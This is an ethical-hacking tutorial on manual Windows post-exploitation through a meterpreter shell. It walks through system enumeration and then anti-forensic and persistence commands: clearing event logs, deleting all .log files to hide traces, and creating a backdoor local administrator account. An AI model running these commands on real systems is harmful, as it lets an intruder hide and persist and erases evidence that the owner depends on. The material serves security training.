Kali Linux, Penetration Testing

Manual Post Exploitation on Windows PC (System Command)

This article is about Post Exploitation on the Victim’s System using the Windows Command Line. When an Attacker gains a meterpreter session on a Remote PC, then he/she can enumerate a huge amount of information and make effective changes using the knowledge of the Windows Command Line.

Requirement

Attacker: Kali Linux

Target: Window PC

To execute this, we will first Obtain the meterpreter session of the Remote PC which you can learn from here. After gaining the session, escalate its privileged to Administrator which you can learn from here.

Now to access the windows command line, type ‘shell’ in the meterpreter shell.

Let’s Start!!

Obtain User Details and its Privileges

After gaining the meterpreter shell or windows command line, before doing any work. It is important to know the current user. This command is usually used to verify that the account that we were trying to access is the one we got. This can be simply done using the command whoami.

To increase our reach, we will an option in the “whoami” command:

[/all]: To show all the details about the user.

whoami /all

As seen below we have the username, SID and local group details

We also Obtain details about the privileges that are enabled or disabled to the user we are currently logged on.

Obtain the System Info

This command helps us enumerate lots of information regarding the system like hostname, domain, time zone and much more.

systeminfo

We can sort the basic system details such as (Manufacturer, Build, and Model) of the victim’s System using findstr.

systeminfo | findstr System

As shown in the below screenshot we have the Boot Time, Manufacturer, Model, Type, Directory and Language of the Victim’s System.

We can obtain the location (as close as the country) of the victim’s System using systeminfo.

Here we are using findstr with systeminfo to filter the systeminfo results.

systeminfo | findstr Time

As shown in the below screenshot we have the Time Zone (UTC+05:30), so we can say that the victim’s System is in “INDIA”.

Obtain Memory Details (Physical, Virtual, In Use, Free)

We can Obtain the basic memory details of the victim’s System using systeminfo.

Here we are using findstr with systeminfo to filter the systeminfo results.

systeminfo | findstr Memory

As shown in the below screenshot we have the Total Physical Memory 3.5 GB out of which 1.6 GB is available, we are also Obtaining Virtual Memory Details.

Obtain the List System Drivers

We can display a list of all installed device drivers on the victim’s system and their properties through the command called driverquery.

driverquery

 

Obtain the List of Kernel Drivers

We can the list of Kernel Drivers on the victim’s System using driverquery.

Here we are using findstr with driverquery to filter the driverquery results.

driverquery | findstr Kernel

As seen below we have obtained a list of kernel drivers which can be used to get the direct exploits to the Victim’s System.

Obtain the List of File System Drivers

We can the list of File System Drivers on the victim’s System using driverquery.

Here we are using findstr with driverquery to filter the driverquery results.

driverquery | findstr "File System"

Display Info about a Particular Service

We can obtain information about a particular service using the sc command. Here we are using the following options with the sc command:

[query] to Obtain the names of a service.

Syntax: sc query [service name]

sc query wuauserv

Obtain the list of Active Tasks

We can obtain information about running tasks using the tasklist command.

This command shows the name of the task running along with the Process ID (PID), Session Name, Session Number and Memory Usage.

tasklist

We can sort the output of tasklist according to the modules using the following options of tasklist command:

[/m]: To specify the Modules in Tasklist

But we will have to mention the module which is to be used to sort the Tasklist.

Syntax: tasklist /m [Module Name]

tasklist /m ntdll.dll

Here we can see all the tasks linked with the ntdll.dll module.

Killing Tasks

We can kill tasks on the Victim’s System using a command called taskkill.

Taskkill requires either one of two things:

  1. Process Id
  2. Task Name

Here we are going to use the [/f] option in taskkill, it enables the Taskkill to forcefully kill the tasks.

Killing the Tasks using the Process ID

Syntax: taskkill /f /pid [Process id of Task]

taskkill /f /pid 7236

Killing the Tasks using the Task Name

Syntax: taskkill /f /im “[Task Name]”

taskkill /f /im "Taskmgr.exe"

Start or Stopping Services

We can start a service or some backdoor without the knowledge of the Victim using the sc command.

Here we are using the following options with sc command:

[start] to start a service.

Syntax:sc start [Service Name]

sc start TeamViewer

As you can see in the below image the service has started.

We can also stop a service using the sc command. Here we are using the following options with sc command:

[stop] to start a service.

Syntax:sc stop [Service Name]

sc stop TeamViewer

As you can see in the below image the process Stopped

List all the logs on the System

We can obtain a list of all the logs on a system using the wevtutil command. Here we are using the following options with the wevtutil command:

[el] to List log names.

wevtutil el

Clear a specific login the System

We can clear a specific log on a system using the wevtutil command. Here we are using the following options with the wevtutil command:

[cl] to List log names.

Syntax: wevtutil cl [log name]

wevtutil cl System

Find all the Hard Disk/Storage Partitions on a System

While penetration testing a Remote PC, knowledge of all the Hard Disk or Storage Devices and Partitions is essential so that we can sweep all the partitions and Storage Devices in hope to find data of any particular importance.

This can be done using the fsutil command. Here we are using the following options with the fsutil command:

[fsinfo] to view file system info.

[drives] to list all drives.

fsutil fsinfo drives

As you can see below that the Victim System has 4 Hard Disk Partitions C, D, E and F

Delete all logs on a System

While penetration testing a remote pc, it is essential to remove the trace of your activities, so we need to remove the evidence of our presence which can be found in log files.

The entire Log file has a .log extension so we are going to sweep the System Directory for files with extension .log and delete them with del command.

Note: Use this command with the path set to System Directory (In my case it is C:\)

Here we are using the following options with the del command:

[/a] to select files based on attributes.

[/s] to select System Files (/s is an attribute so it is to be used after /a)

[/q] to use Quiet Mode (It doesn’t ask if OK to delete on global wildcards)

[/f] to force delete the read-only files

Syntax: del [Directory]\*.log /a /s /q /f

del \*.log /a /s /q /f

As you can see in the below screenshot the process of detecting and deleting the files with the .log extension has started.

Manage Local Users

While penetration testing a remote PC, it is important to obtain the list of Local Users so that the attacker can gain information about the various users assigned to that particular system.

This can be done using net command. Here we are using the following options to be used with the net command:

[-user] to display the list of local users

net user

It is always advantageous to add a user in the Local Groups so that the attacker can perform certain tasks on that system.

This can be done using net command. Here we are using the following options with the net command:

Syntax:net user [logon_name] [password] /add

net user hacker pass123 /add

Many times, we come across a situation where we will have to perform certain administrative tasks, so we will add the user we created to the Administrative local group

Here we are using the following options to be used with the net command:

[-localgroup] to select the list of local groups

Syntax: net localgroup administrators [logon_name] /add

net localgroup administrators hacker/add

In the above example, I have added a user in the local administrator’s group named as the hacker. We can verify using the “net user” command

Now, during the clean-up process, it is important to delete the local user-created.

This can be done using net command. Here we are using the following options with the net command:

Syntax: net user [logon_name] /del

net user hacker /del

Here you can see that I have used the net command to add a user, making it a member of the administrator local group and then deleting that user.

Display the List of all Scheduled Tasks

While penetration testing a remote PC, it is necessary to know the scheduled tasks to plan the attacks accordingly to further penetrate the Victim’s System. This can be done using schtasks.

We can sort schtasks so as to obtain a better readable format i.e. in a List Format.

Here we are using the following options with the schtasks command:

[/query]to display all scheduled tasks

[/fo] to specify the format of the Output (In this case we use List)

[/v] to use verbose mode

schtasks /query /fo LIST /v

Author: Pavandeep Singh is an Ethical Hacker, Web Penetration Tester, Windows Command Line Expert and Researcher at hackingarticles.in. Contact here